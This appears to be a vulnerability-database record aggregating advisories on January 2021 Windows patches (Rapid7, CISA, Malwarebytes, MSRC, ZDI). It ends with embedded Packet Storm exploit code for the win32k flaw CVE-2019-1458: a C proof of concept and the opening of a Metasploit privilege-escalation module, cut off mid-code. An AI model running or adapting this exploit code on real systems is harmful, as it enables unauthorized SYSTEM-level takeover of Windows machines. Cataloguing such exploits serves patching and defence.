\n[CVE-2021-1703](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1703>) | Windows Event Logging Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1645](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1645>) | Windows Docker Information Disclosure Vulnerability | No | No | 5 | Yes \n[CVE-2021-1637](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1637>) | Windows DNS Query Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-1638](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1638>) | Windows Bluetooth Security Feature Bypass Vulnerability | No | No | 7.7 | No \n[CVE-2021-1683](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1683>) | Windows Bluetooth Security Feature Bypass Vulnerability | No | No | 5 | No \n[CVE-2021-1684](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1684>) | Windows Bluetooth Security Feature Bypass Vulnerability | No | No | 5 | No \n[CVE-2021-1642](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1642>) | Windows AppX Deployment Extensions Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1685](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1685>) | Windows AppX Deployment Extensions Elevation of Privilege Vulnerability | No | No | 7.3 | No \n[CVE-2021-1648](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1648>) | Microsoft splwow64 Elevation of Privilege Vulnerability | No | Yes | 7.8 | Yes \n[CVE-2021-1710](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1710>) | Microsoft Windows Media Foundation Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-1691](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1691>) | Hyper-V Denial of Service Vulnerability | No | No | 7.7 | No \n[CVE-2021-1692](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1692>) | Hyper-V Denial of Service Vulnerability | No | No | 7.7 | No \n[CVE-2021-1643](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1643>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-1644](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1644>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n \n## Windows Apps Vulnerabilities\n\nCVE | title | Exploited | Disclosed | CVSS3 | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1669](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1669>) | Windows Remote Desktop Security Feature Bypass Vulnerability | No | No | 8.8 | Yes \n \n## Windows ESU Vulnerabilities\n\nCVE | title | Exploited | Disclosed | CVSS3 | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1709](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1709>) | Windows Win32k Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-1694](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1694>) | Windows Update Stack Elevation of Privilege Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-1702](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1702>) | Windows Remote Procedure Call Runtime Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1674](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1674>) | Windows Remote Desktop Protocol Core Security Feature Bypass Vulnerability | No | No | 8.8 | No \n[CVE-2021-1695](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1695>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1676](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1676>) | Windows NT Lan Manager Datagram Receiver Driver Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-1706](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1706>) | Windows LUAFV Elevation of Privilege Vulnerability | No | No | 7.3 | No \n[CVE-2021-1661](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1661>) | Windows Installer Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1704](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1704>) | Windows Hyper-V Elevation of Privilege Vulnerability | No | No | 7.3 | No \n[CVE-2021-1696](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1696>) | Windows Graphics Component Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-1708](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1708>) | Windows GDI+ Information Disclosure Vulnerability | No | No | 5.7 | Yes \n[CVE-2021-1657](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1657>) | Windows Fax Compose Form Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-1679](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1679>) | Windows CryptoAPI Denial of Service Vulnerability | No | No | 6.5 | No \n[CVE-2021-1652](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1652>) | Windows CSC Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1653](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1653>) | Windows CSC Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1654](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1654>) | Windows CSC Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1655](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1655>) | Windows CSC Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1659](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1659>) | Windows CSC Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1688>) | Windows CSC Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1693](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1693>) | Windows CSC Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1699](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1699>) | Windows (modem.sys) Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-1656](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1656>) | TPM Device Driver Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-1658](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1658>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-1660](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1660>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-1666](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1666>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-1667](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1667>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-1673](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1673>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-1664](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1664>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-1671](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1671>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-1700](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1700>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-1701](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1701>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-1678](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1678>) | NTLM Security Feature Bypass Vulnerability | No | No | 4.3 | No \n[CVE-2021-1668](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1668>) | Microsoft DTV-DVD Video Decoder Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-1665](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1665>) | GDI+ Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-1649](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1649>) | Active Template Library Elevation of Privilege Vulnerability | No | No | 7.8 | No \n \n## Summary Graphs\n\n\n\n________Note: Graph data is reflective of data presented by Microsoft's CVRF at the time of writing.________", "modified": "2021-01-12T23:59:00", "published": "2021-01-12T23:59:00", "id": "RAPID7BLOG:A8AF62CC15B38126207722D29F080EE3", "href": "https://blog.rapid7.com/2021/01/12/patch-tuesday-january-2021/", "type": "rapid7blog", "title": "Patch Tuesday - January 2021", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2021-02-24T18:06:37", "bulletinFamily": "info", "cvelist": ["CVE-2021-1647"], "description": "Microsoft has released a security advisory to address a remote code execution vulnerability,[ CVE-2021-1647](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1647>), in Microsoft Defender. A remote attacker can exploit this vulnerability to take control of an affected system. This vulnerability was detected in exploits in the wild.\n\nCISA encourages users and administrators to review Microsoft Advisory for CVE-2021-1647 and apply the necessary updates. \n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/01/14/rce-vulnerability-affecting-microsoft-defender>); we'd welcome your feedback.\n", "modified": "2021-01-14T00:00:00", "published": "2021-01-14T00:00:00", "id": "CISA:F7C7CFE30EB8A6B7C1DCDEA50F649F74", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/01/14/rce-vulnerability-affecting-microsoft-defender", "type": "cisa", "title": "RCE Vulnerability Affecting Microsoft Defender ", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "malwarebytes": [{"lastseen": "2021-01-15T10:26:58", "bulletinFamily": "blog", "cvelist": ["CVE-2021-1647"], "description": "Every second Tuesday of the month it&#x27;s &#x27;Patch Tuesday&#x27;. On Patch Tuesday Microsoft habitually issues a lot of patches for bugs and vulnerabilities in its software.\n\nIt&#x27;s always important to patch, but the update that was released on January 12 is one to pay attention to. That&#x27;s because it contains a patch for a vulnerability in Windows Defender that is already being exploited in the wild.\n\n### The vulnerability in Windows Defender\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) list\u2014a dictionary that provides definitions for publicly disclosed cybersecurity vulnerabilities and exposures. The goal of CVE is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services).\n\nThe vulnerability in Windows Defender was registered as [CVE-2021-1647](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-1647>)\u2014a Remote Code Execution ([RCE](<https://blog.malwarebytes.com/glossary/remote-code-execution-rce-attack/>)) vulnerability\u2014and was found in the Malware Protection Engine component (mpengine.dll). According to Microsoft: \n\n> &quot;While this issue is labeled as an elevation of privilege, it can also be exploited to disclose information. The type of information that could be disclosed if an attacker successfully exploited this vulnerability is uninitialized memory.&quot;\n\n### I don\u2019t see an update for this vulnerability\n\nIf you are missing this fix in your list, it&#x27;s possible that this bug has already been patched by Microsoft on end-user systems, as the company continuously updates Defender outside of the normal monthly patch cycle. But you may want to check whether you are using a patched version.\n\n### What version of Windows Defender am I using?\n\nThe first patched version is 1.1.17700.4. If you want to make sure that you have a patched version of Windows Defender, here is how you can check this on a Windows 10 computer:\n\n * From the Windows Start Menu, search for **Windows Security** and click on the result that has the **App** text and the \u201cwhite on blue\u201d shield.\n * When Windows Security opens, click on the gear box icon with the **Settings** text at the bottom left of the Window.\n * When the Settings screen opens, click on the **About** link.\n * The Windows Security About page will now be open and will show the Antimalware Client Version (Microsoft Defender version), the Engine version (Scanning Engine), the Antivirus version (Virus definitions), and the Antispyware version (Spyware definitions).\n * The **engine version** is the one that matters here. It needs to be at 1.1.17700.4 or newer.\nFinding the Windows Defender version\n\n### The rest of the Microsoft updates\n\nThe total package contained over 80 patches. Ten of them were classified as critical, which means that they could possibly be used in the future by cybercriminals to attack unpatched systems. And even the ones that are not rated as critical could put you at risk at some point. It&#x27;s always important to apply all the patches as soon as you possibly can, especially when it concerns your operating system. So, please do go install these patches as soon as possible.\n\nStay safe, everyone!\n\nThe post [Microsoft issues 83 patches, one for actively exploited vulnerability](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/01/microsoft-issues-83-patches-one-for-actively-exploited-vulnerability/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "modified": "2021-01-13T19:40:58", "published": "2021-01-13T19:40:58", "id": "MALWAREBYTES:C38FDAA2A9E5E349305313C6D17A0D3A", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/01/microsoft-issues-83-patches-one-for-actively-exploited-vulnerability/", "type": "malwarebytes", "title": "Microsoft issues 83 patches, one for actively exploited vulnerability", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "mscve": [{"lastseen": "2021-01-16T03:31:04", "bulletinFamily": "microsoft", "cvelist": ["CVE-2021-1647"], "description": "\n", "edition": 4, "modified": "2021-01-15T08:00:00", "id": "MS:CVE-2021-1647", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1647", "published": "2021-01-15T08:00:00", "title": "Microsoft Defender Remote Code Execution Vulnerability", "type": "mscve", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-16T01:37:12", "bulletinFamily": "microsoft", "cvelist": ["CVE-2021-1648"], "description": "\n", "edition": 2, "modified": "2021-01-12T08:00:00", "id": "MS:CVE-2021-1648", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1648", "published": "2021-01-12T08:00:00", "title": "Microsoft splwow64 Elevation of Privilege Vulnerability", "type": "mscve", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-21T13:27:50", "bulletinFamily": "microsoft", "cvelist": ["CVE-2021-1660"], "description": "\n", "edition": 2, "modified": "2021-01-12T08:00:00", "id": "MS:CVE-2021-1660", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1660", "published": "2021-01-12T08:00:00", "title": "Remote Procedure Call Runtime Remote Code Execution Vulnerability", "type": "mscve", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-01-22T13:31:40", "bulletinFamily": "microsoft", "cvelist": ["CVE-2021-1709"], "description": "\n", "edition": 2, "modified": "2021-01-12T08:00:00", "id": "MS:CVE-2021-1709", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1709", "published": "2021-01-12T08:00:00", "title": "Windows Win32k Elevation of Privilege Vulnerability", "type": "mscve", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-07T11:48:27", "bulletinFamily": "microsoft", "cvelist": ["CVE-2018-8514"], "description": "An information disclosure vulnerability exists when the Windows Remote Procedure Call (RPC) runtime improperly initializes objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nTo exploit this vulnerability, an authenticated attacker could run a specially crafted application.\n\nThe update addresses the vulnerability by correcting how the Remote Procedure Call runtime initializes objects in memory.\n", "edition": 2, "modified": "2018-12-11T08:00:00", "id": "MS:CVE-2018-8514", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8514", "published": "2018-12-11T08:00:00", "title": "Windows Remote Procedure Call Information Disclosure Vulnerability", "type": "mscve", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-08-07T11:48:18", "bulletinFamily": "microsoft", "cvelist": ["CVE-2019-1458"], "description": "An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nTo exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system.\n\nThe update addresses this vulnerability by correcting how Win32k handles objects in memory.\n", "edition": 2, "modified": "2019-12-10T08:00:00", "id": "MS:CVE-2019-1458", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1458", "published": "2019-12-10T08:00:00", "title": "Win32k Elevation of Privilege Vulnerability", "type": "mscve", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-07T11:48:32", "bulletinFamily": "microsoft", "cvelist": ["CVE-2019-1409"], "description": "An information disclosure vulnerability exists when the Windows Remote Procedure Call (RPC) runtime improperly initializes objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nTo exploit this vulnerability, an authenticated attacker could run a specially crafted application.\n\nThe update addresses the vulnerability by correcting how the Remote Procedure Call runtime initializes objects in memory.\n", "edition": 2, "modified": "2019-11-12T08:00:00", "id": "MS:CVE-2019-1409", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1409", "published": "2019-11-12T08:00:00", "title": "Windows Remote Procedure Call Information Disclosure Vulnerability", "type": "mscve", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}], "zdi": [{"lastseen": "2021-01-14T19:27:09", "bulletinFamily": "info", "cvelist": ["CVE-2021-1648"], "description": "This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the user-mode printer driver host process splwow64.exe. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to escalate privileges from low integrity and execute arbitrary code in the context of the current user at medium integrity.", "edition": 1, "modified": "2021-01-14T00:00:00", "published": "2021-01-14T00:00:00", "id": "ZDI-21-024", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-024/", "title": "Microsoft Windows splwow64 Out-Of-Bounds Read Privilege Escalation Vulnerability", "type": "zdi", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-01-14T19:27:09", "bulletinFamily": "info", "cvelist": ["CVE-2021-1648"], "description": "This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the user-mode printer driver host process splwow64.exe. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to escalate privileges from low integrity and execute arbitrary code in the context of the current user at medium integrity.", "edition": 1, "modified": "2021-01-14T00:00:00", "published": "2021-01-14T00:00:00", "id": "ZDI-21-020", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-020/", "title": "Microsoft Windows splwow64 Out-Of-Bounds Read Privilege Escalation Vulnerability", "type": "zdi", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-01-14T19:27:09", "bulletinFamily": "info", "cvelist": ["CVE-2021-1648"], "description": "This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the user-mode printer driver host process splwow64.exe. The issue results from the lack of proper validation of a user-supplied value prior to dereferencing it as a pointer. An attacker can leverage this vulnerability to escalate privileges from low integrity and execute arbitrary code in the context of the current user at medium integrity.", "edition": 1, "modified": "2021-01-14T00:00:00", "published": "2021-01-14T00:00:00", "id": "ZDI-21-022", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-022/", "title": "Microsoft Windows splwow64 Untrusted Pointer Dereference Privilege Escalation Vulnerability", "type": "zdi", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-01-21T19:27:56", "bulletinFamily": "info", "cvelist": ["CVE-2021-1648"], "description": "This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the user-mode printer driver host process splwow64.exe. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to escalate privileges from low integrity and execute arbitrary code in the context of the current user at medium integrity.", "edition": 1, "modified": "2021-01-21T00:00:00", "published": "2021-01-21T00:00:00", "id": "ZDI-21-078", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-078/", "title": "Microsoft Windows splwow64 Out-Of-Bounds Read Privilege Escalation Vulnerability", "type": "zdi", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2020-03-09T22:44:29", "description": "", "published": "2020-03-06T00:00:00", "type": "packetstorm", "title": "Microsoft Windows WizardOpium Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-1458"], "modified": "2020-03-06T00:00:00", "id": "PACKETSTORM:156651", "href": "https://packetstormsecurity.com/files/156651/Microsoft-Windows-WizardOpium-Local-Privilege-Escalation.html", "sourceData": "`#include <cstdio> \n#include <windows.h> \n \nextern \"C\" NTSTATUS NtUserMessageCall(HWND hWnd, UINT msg, WPARAM wParam, LPARAM lParam, ULONG_PTR ResultInfo, DWORD dwType, BOOL bAscii); \n \nint main() { \nHINSTANCE hInstance = GetModuleHandle(NULL); \n \nWNDCLASSEX wcx; \nZeroMemory(&wcx, sizeof(wcx)); \nwcx.hInstance = hInstance; \nwcx.cbSize = sizeof(wcx); \nwcx.lpszClassName = L\"SploitWnd\"; \nwcx.lpfnWndProc = DefWindowProc; \nwcx.cbWndExtra = 8; //pass check in xxxSwitchWndProc to set wnd->fnid = 0x2A0 \n \nprintf(\"[*] Registering window\\n\"); \nATOM wndAtom = RegisterClassEx(&wcx); \nif (wndAtom == INVALID_ATOM) { \nprintf(\"[-] Failed registering SploitWnd window class\\n\"); \nexit(-1); \n} \n \nprintf(\"[*] Creating instance of this window\\n\"); \nHWND sploitWnd = CreateWindowEx(0, L\"SploitWnd\", L\"\", WS_VISIBLE, 0, 0, 0, 0, NULL, NULL, hInstance, NULL); \nif (sploitWnd == INVALID_HANDLE_VALUE) { \nprintf(\"[-] Failed to create SploitWnd window\\n\"); \nexit(-1); \n} \n \nprintf(\"[*] Calling NtUserMessageCall to set fnid = 0x2A0 on window\\n\"); \nNtUserMessageCall(sploitWnd, WM_CREATE, 0, 0, 0, 0xE0, 1); \n \nprintf(\"[*] Allocate memory to be used for corruption\\n\"); \nPVOID mem = VirtualAlloc(0, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); \nprintf(\"\\tptr: %p\\n\", mem); \nPBYTE byteView = (PBYTE)mem; \nbyteView[0x6c] = 1; // use GetKeyState in xxxPaintSwitchWindow \n \n//pass DrawSwitchWndHilite double dereference \nPVOID* ulongView = (PVOID*)mem; \nulongView[0x20 / sizeof(PVOID)] = mem; \n \nprintf(\"[*] Calling SetWindowLongPtr to set window extra data, that will be later dereferenced\\n\"); \nSetWindowLongPtr(sploitWnd, 0, (LONG_PTR)mem); \nprintf(\"[*] GetLastError = %x\\n\", GetLastError()); \n \nprintf(\"[*] Creating switch window #32771, this has a result of setting (gpsi+0x154) = 0x130\\n\"); \nHWND switchWnd = CreateWindowEx(0, (LPCWSTR)0x8003, L\"\", 0, 0, 0, 0, 0, NULL, NULL, hInstance, NULL); \n \nprintf(\"[*] Simulating alt key press\\n\"); \nBYTE keyState[256]; \nGetKeyboardState(keyState); \nkeyState[VK_MENU] |= 0x80; \nSetKeyboardState(keyState); \n \nprintf(\"[*] Triggering dereference of wnd->extraData by calling NtUserMessageCall second time\"); \nNtUserMessageCall(sploitWnd, WM_ERASEBKGND, 0, 0, 0, 0x0, 1); \n} \n`\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/156651/mswindowswizard-escalate.txt"}, {"lastseen": "2020-10-15T19:31:18", "description": "", "published": "2020-10-15T00:00:00", "type": "packetstorm", "title": "Microsoft Windows Uninitialized Variable Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-1458"], "modified": "2020-10-15T00:00:00", "id": "PACKETSTORM:159569", "href": "https://packetstormsecurity.com/files/159569/Microsoft-Windows-Uninitialized-Variable-Local-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core/post/file' \nrequire 'msf/core/exploit/exe' \nrequire 'msf/core/post/windows/priv' \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = NormalRanking \n \ninclude Msf::Post::File \ninclude Msf::Exploit::EXE \ninclude Msf::Post::Windows::Priv \ninclude Msf::Post::Windows::FileInfo \ninclude Msf::Post::Windows::ReflectiveDLLInjection \ninclude Msf::Exploit::Remote::AutoCheck \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Microsoft Windows Uninitialized Variable Local Privilege Elevation', \n'Description' => %q{ \nThis module exploits CVE-2019-1458, an arbitrary pointer dereference vulnerability \nwithin win32k which occurs due to an uninitalized variable, which allows user mode attackers \nto write a limited amount of controlled data to an attacker controlled address \nin kernel memory. By utilizing this vulnerability to execute controlled writes \nto kernel memory, an attacker can gain arbitrary code execution \nas the SYSTEM user. \n \nThis module has been tested against Windows 7 x64 SP1. Offsets within the \nexploit code may need to be adjusted to work with other versions of Windows. \nThe exploit can only be triggered once against the target and can cause the \ntarget machine to reboot when the session is terminated. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'piotrflorczyk', # poc \n'unamer', # exploit \n'timwr', # msf module \n], \n'Platform' => 'win', \n'SessionTypes' => ['meterpreter'], \n'Targets' => \n[ \n['Windows 7 x64', { 'Arch' => ARCH_X64 }] \n], \n'Notes' => \n{ \n'Stability' => [ CRASH_OS_RESTARTS ], \n'Reliability' => [ UNRELIABLE_SESSION ] \n}, \n'References' => \n[ \n['CVE', '2019-1458'], \n['URL', 'https://github.com/unamer/CVE-2019-1458'], \n['URL', 'https://github.com/piotrflorczyk/cve-2019-1458_POC'], \n['URL', 'https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/'], \n['URL', 'https://googleprojectzero.blogspot.com/p/rca-cve-2019-1458.html'] \n], \n'DisclosureDate' => '2019-12-10', \n'DefaultTarget' => 0, \n'AKA' => [ 'WizardOpium' ] \n) \n) \nregister_options([ \nOptString.new('PROCESS', [true, 'Name of process to spawn and inject dll into.', 'notepad.exe']) \n]) \nend \n \ndef setup_process \nprocess_name = datastore['PROCESS'] \nbegin \nprint_status(\"Launching #{process_name} to host the exploit...\") \nlaunch_process = client.sys.process.execute(process_name, nil, 'Hidden' => true) \nprocess = client.sys.process.open(launch_process.pid, PROCESS_ALL_ACCESS) \nprint_good(\"Process #{process.pid} launched.\") \nrescue Rex::Post::Meterpreter::RequestError \n# Sandboxes could not allow to create a new process \n# stdapi_sys_process_execute: Operation failed: Access is denied. \nprint_error('Operation failed. Trying to elevate the current process...') \nprocess = client.sys.process.open \nend \nprocess \nend \n \ndef check \nsysinfo_value = sysinfo['OS'] \n \nif sysinfo_value !~ /windows/i \n# Non-Windows systems are definitely not affected. \nreturn CheckCode::Safe \nend \n \nfile_path = expand_path('%WINDIR%\\\\system32\\\\win32k.sys') \nmajor, minor, build, revision, branch = file_version(file_path) \nvprint_status(\"win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}\") \n \nbuild_num_gemversion = Gem::Version.new(\"#{major}.#{minor}.#{build}.#{revision}\") \n \n# Build numbers taken from https://www.qualys.com/research/security-alerts/2019-12-10/microsoft/ \nif (build_num_gemversion >= Gem::Version.new('6.0.6000.0')) && (build_num_gemversion < Gem::Version.new('6.0.6003.20692')) # Windows Vista and Windows Server 2008 \nreturn CheckCode::Appears \nelsif (build_num_gemversion >= Gem::Version.new('6.1.7600.0')) && (build_num_gemversion < Gem::Version.new('6.1.7601.24540')) # Windows 7 and Windows Server 2008 R2 \nreturn CheckCode::Appears \nelsif (build_num_gemversion >= Gem::Version.new('6.2.9200.0')) 